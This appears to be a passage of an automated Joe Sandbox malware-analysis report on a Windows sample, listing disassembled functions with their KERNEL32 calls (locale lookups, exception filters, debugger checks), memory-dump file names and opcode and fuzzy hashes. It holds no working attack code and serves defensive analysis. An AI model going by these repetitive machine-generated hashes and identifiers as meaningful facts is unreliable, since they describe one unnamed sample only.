Part of subcall function 00AB62CF: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00AB6375

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00AC1683
IsValidCodePage.KERNEL32(00000000), ref: 00AC16C1
IsValidLocale.KERNEL32(?,00000001), ref: 00AC16D4
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00AC171C
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00AC1737

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: db1444f29ec5f68743cfb59c1df0646420bf456886c84777cb71370b398bae88
Instruction ID: 88bb53cdf4f141646f75ca683918556c77f1a7149b7011e8f930b7da6c7bb461
Opcode Fuzzy Hash: db1444f29ec5f68743cfb59c1df0646420bf456886c84777cb71370b398bae88
Instruction Fuzzy Hash: A4518C71A00209ABDF10DFA4CC41FBE77B9FF0A700F1A456DE905E7292EB7099058B60

Function 00AB1F40 Relevance: 6.5, APIs: 4, Instructions: 455COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31a0e38ba20bd8e180b811d2703fbebb8ddc6f9a9a33c4cff84b8e53218f21aa
Instruction ID: ca8d08eed4ff5897cf1b8217c830b0ff95871aad21f6ac176b3b580d18dfeb96
Opcode Fuzzy Hash: 31a0e38ba20bd8e180b811d2703fbebb8ddc6f9a9a33c4cff84b8e53218f21aa
Instruction Fuzzy Hash: 07022971E012199BDB14CFA9D9807EEBBF5FF48314F24826AD919EB341D731AA41CB90

Function 00AAA4D7 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00AAA4E3
IsDebuggerPresent.KERNEL32 ref: 00AAA5AF
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AAA5CF
UnhandledExceptionFilter.KERNEL32(?), ref: 00AAA5D9

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 1d58f61e49e2c0f02fbc8e63425f995bc5187f539ccce98be9dd1523e532e225
Instruction ID: 31656d3bb557e41c93696adc2e6ff0ca9095a61f6b6fd353f0d24d49b643c091
Opcode Fuzzy Hash: 1d58f61e49e2c0f02fbc8e63425f995bc5187f539ccce98be9dd1523e532e225
Instruction Fuzzy Hash: 0B310675D012189BDB21DFA4D989BCDBBB8BF18300F1041AAE40CAB290EB755A89CF15

Function 00AC1023 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00AB62CF: GetLastError.KERNEL32(00000000,?,00ABB8D5), ref: 00AB62D3
Part of subcall function 00AB62CF: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00AB6375

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00AC1077
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00AC10C1
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00AC1187

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 8e7aa24c12340eacdd262d0c1365e5b9960c977f65ec3efa7fef44502bf558d8
Instruction ID: 937f826992d089f00385c56851b7dcda52af5500875a7e362c9c2a39cab86ffd
Opcode Fuzzy Hash: 8e7aa24c12340eacdd262d0c1365e5b9960c977f65ec3efa7fef44502bf558d8
Instruction Fuzzy Hash: 2B61BF716101079FEF28DF28CD82FAAB7A8EF16314F15417DEA05C6682EB38D985DB50

Function 00AB10E1 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00AA112E), ref: 00AB11D9
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00AA112E), ref: 00AB11E3
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00AA112E), ref: 00AB11F0

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: b14fb7e4f1dcd2550de2b86b2379fe216c998472dc50aed21d22cccfef8407b2
Instruction ID: 64a39753da2174f790918f24c368f2f278c3f7ddf3f7112beca9f08bcd3a749d
Opcode Fuzzy Hash: b14fb7e4f1dcd2550de2b86b2379fe216c998472dc50aed21d22cccfef8407b2
Instruction Fuzzy Hash: 5631B37490121C9BCB21DF64D989BCDBBB8BF08310F5042EAE41CA72A1EB749B85CF45

Function 00ABBCA6 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00ABBCA1,?,?,00000008,?,?,00AC4F8A,00000000), ref: 00ABBED3

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 98dde01bb48556a272cf3fc4e30ca9e170b39414b889e8f36bd9cd80641c9845
Instruction ID: 8971bdb98936b45bb59c861613d2bcb399263647511b6c34c637c0c3bbbc4ddc
Opcode Fuzzy Hash: 98dde01bb48556a272cf3fc4e30ca9e170b39414b889e8f36bd9cd80641c9845
Instruction Fuzzy Hash: C1B14D31220608DFD715CF28C486BA57BE4FF45364F298698E999CF2A2C375E991CB50

Function 00AAA745 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00AAA75B

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 4fc34ed2a8e718e07179fe49d74555b4a3196147ad8b18544f5b8f5ad758d05a
Instruction ID: 5ee5a4f6cd343e1007663aa3c89ee813143675bd86c228a3dc3453f9956425b6
Opcode Fuzzy Hash: 4fc34ed2a8e718e07179fe49d74555b4a3196147ad8b18544f5b8f5ad758d05a
Instruction Fuzzy Hash: C25180B1E056058FDB18CFA5E8857AEBBF0FB58310F14856AD416EB290E7789D02CF51

Function 00ABDEF1 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c077c9e52c84067a9499a4c14b5c2d60f7bef2296bd3d869c2e13a81eb631ca
Instruction ID: 998bcca381236fb01d30a2a44db229632443066efe5d391a31bc7594bb22530f
Opcode Fuzzy Hash: 1c077c9e52c84067a9499a4c14b5c2d60f7bef2296bd3d869c2e13a81eb631ca
Instruction Fuzzy Hash: C4418275805219AEDB20EF79CC89EEABBBDAF45300F1442DDE41997202EA359E858F50

Function 00AC1276 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00AB62CF: GetLastError.KERNEL32(00000000,?,00ABB8D5), ref: 00AB62D3
Part of subcall function 00AB62CF: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00AB6375

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00AC12CA

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: a43098f59294e0454fff9c63165e8f592dc4069b470fb5edbb76cb8e1601532b
Instruction ID: b4ac7fd44d21ff6b26256f41d50917244efc768e3d6b6c1e76960b86bab66f45
Opcode Fuzzy Hash: a43098f59294e0454fff9c63165e8f592dc4069b470fb5edbb76cb8e1601532b
Instruction Fuzzy Hash: 0121B332610246ABDB18AF69DD41FBA37ACEF16318F11007EF902DA642EB38DD018650

Function 00AAFCF4 Relevance: 1.6, Strings: 1, Instructions: 333COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00AAFE64

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: e8734e54c91f60361e5cc4621796bd98fc79e9c79ec98d087c5591e41e6f804d
Instruction ID: 72d40487d1ff84a19924cd19633a438cdb14ad7e7e51fb3a1694f501fbc6e168
Opcode Fuzzy Hash: e8734e54c91f60361e5cc4621796bd98fc79e9c79ec98d087c5591e41e6f804d
Instruction Fuzzy Hash: BBC1C0349006068FCB3ECFA8C594ABABBB5AF07308F14462AD4569B6E2D335ED45CB51

Function 00AC0EFD Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00AB62CF: GetLastError.KERNEL32(00000000,?,00ABB8D5), ref: 00AB62D3
Part of subcall function 00AB62CF: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00AB6375

EnumSystemLocalesW.KERNEL32(00AC1023,00000001,00000000,?,-00000050,?,00AC1657,00000000,?,?,?,00000055,?), ref: 00AC0F6F

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 2a7d2ec998e04eb59878b5e03e99b6421645567dbc0a4343298695679306b3d5
Instruction ID: abb40ffdd6ee184888d6b79469f054d36a43855fc17c33351a4f6900b4ec2cda
Opcode Fuzzy Hash: 2a7d2ec998e04eb59878b5e03e99b6421645567dbc0a4343298695679306b3d5
Instruction Fuzzy Hash: E31129366043019FDB289F78C8A1EBAB792FF80368B19442CE54687A40D775A982C780

Function 00AC14A5 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00AB62CF: GetLastError.KERNEL32(00000000,?,00ABB8D5), ref: 00AB62D3
Part of subcall function 00AB62CF: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00AB6375

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00AC123F,00000000,00000000,?), ref: 00AC14D1

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: c41b6d5d571ee064be14f39e5702916e78768ce813a7f56c091ca64e133cd1c9
Instruction ID: d099de276ec780449543fa4bc4b7c9731792aa444e4a1549ead9bff93e581e5d
Opcode Fuzzy Hash: c41b6d5d571ee064be14f39e5702916e78768ce813a7f56c091ca64e133cd1c9
Instruction Fuzzy Hash: 6901D632704116ABDB285B648905FFB7769EB81354F16442DEC07E3181EE74ED42C690

Function 00AC0F98 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00AB62CF: GetLastError.KERNEL32(00000000,?,00ABB8D5), ref: 00AB62D3
Part of subcall function 00AB62CF: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00AB6375

EnumSystemLocalesW.KERNEL32(00AC1276,00000001,00000000,?,-00000050,?,00AC161F,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00AC0FE2

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: fd486f472bdf858a644e3a04cbed8aa256866d16fb5ca5222817869598b9f016
Instruction ID: f339cd6914ab42388030dc57eb10b809586c8befe081407048e38888fc1cf091
Opcode Fuzzy Hash: fd486f472bdf858a644e3a04cbed8aa256866d16fb5ca5222817869598b9f016
Instruction Fuzzy Hash: 7AF0C2362003049FDB245F799881FAABBD5FF80368B06442CFA458B691D6B59C82C790

Function 00AB79B9 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00AB13AA: EnterCriticalSection.KERNEL32(-0002A8A7,?,00AB5FA7,?,00AD5A20,00000008,00AB616B,CE3BFFFF,00AADDC1,?,CE3BFFFF,00AADDC1,00AA112E,?,00AB125E), ref: 00AB13B9

EnumSystemLocalesW.KERNEL32(00AB79AC,00000001,00AD5B40,0000000C,00AB7DE1,00000000), ref: 00AB79F1

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: a5f22bb406de9f950333bee0621683ce12c4c1c9ca6eda45e1a5c8ede95b7a35
Instruction ID: 2408efec339ea5be0b13f04c728529801cd954cf36dc95fa61b59c3a06bedea9
Opcode Fuzzy Hash: a5f22bb406de9f950333bee0621683ce12c4c1c9ca6eda45e1a5c8ede95b7a35
Instruction Fuzzy Hash: F2F03732A15204EFD740EFA8E842B9D77F0FB44761F10811BE4129B2E1DBB949018F50

Function 00AC0EB2 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00AB62CF: GetLastError.KERNEL32(00000000,?,00ABB8D5), ref: 00AB62D3
Part of subcall function 00AB62CF: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00AB6375

EnumSystemLocalesW.KERNEL32(00AC0E0B,00000001,00000000,?,?,00AC1679,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00AC0EE9

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 53c23481eaa5a53fac85b3ef1ef6a00fb19ea684a6700089dd65effc008897eb
Instruction ID: 18e3637229329ac070a6967dfed34344c5b4e8cf886c15889466ae58a0c3c12a
Opcode Fuzzy Hash: 53c23481eaa5a53fac85b3ef1ef6a00fb19ea684a6700089dd65effc008897eb
Instruction Fuzzy Hash: 23F0553638020497CB04AF79D845FAA7F94FFC1724B0B045DEA098B290C6359843CB90

Function 00AB7EE5 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00AB4C4F,?,20001004,00000000,00000002,?,?,00AB4241), ref: 00AB7F19

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 0627843deb7cd1633c905e81cf438a1441d33583bc37ae4f5d2d4380fb0cb4f0
Instruction ID: 1e8095c81bd820452a5f261beee82664b73e1a2213345e38b2248a435e77ac3c
Opcode Fuzzy Hash: 0627843deb7cd1633c905e81cf438a1441d33583bc37ae4f5d2d4380fb0cb4f0
Instruction Fuzzy Hash: 5BE01A31504118BBCB126F61DD05EEE7A6AEB84760F054010F90565222CB758D22AA98

Function 00AAA63A Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000A646,00AA9E2B), ref: 00AAA63F

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 893a3abeb54da8653dc27bf25ae95ac4664a69d3f4f8e2d8f14431a0b2b1ac3c
Instruction ID: 73d6f7191fa016e7e1288707d633eefc2548947057ad2c19a2a05c3918c885d2
Opcode Fuzzy Hash: 893a3abeb54da8653dc27bf25ae95ac4664a69d3f4f8e2d8f14431a0b2b1ac3c
Instruction Fuzzy Hash:

Function 00AC17D8 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00AC17D8

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 1ec078eb3cc9ea61e2f571cf302796c0254b66ed353decf3eaf145556afe9655
Instruction ID: de33172362ae38ebd0ddf101b08e76c1b852b69e3a6fad926545106cfc46eaa1
Opcode Fuzzy Hash: 1ec078eb3cc9ea61e2f571cf302796c0254b66ed353decf3eaf145556afe9655
Instruction Fuzzy Hash: 4DA01130202200CF8300CFBAAA082083BBABB002C0B02802AA002C02A0EE2882028F00

Function 00ABC4A9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
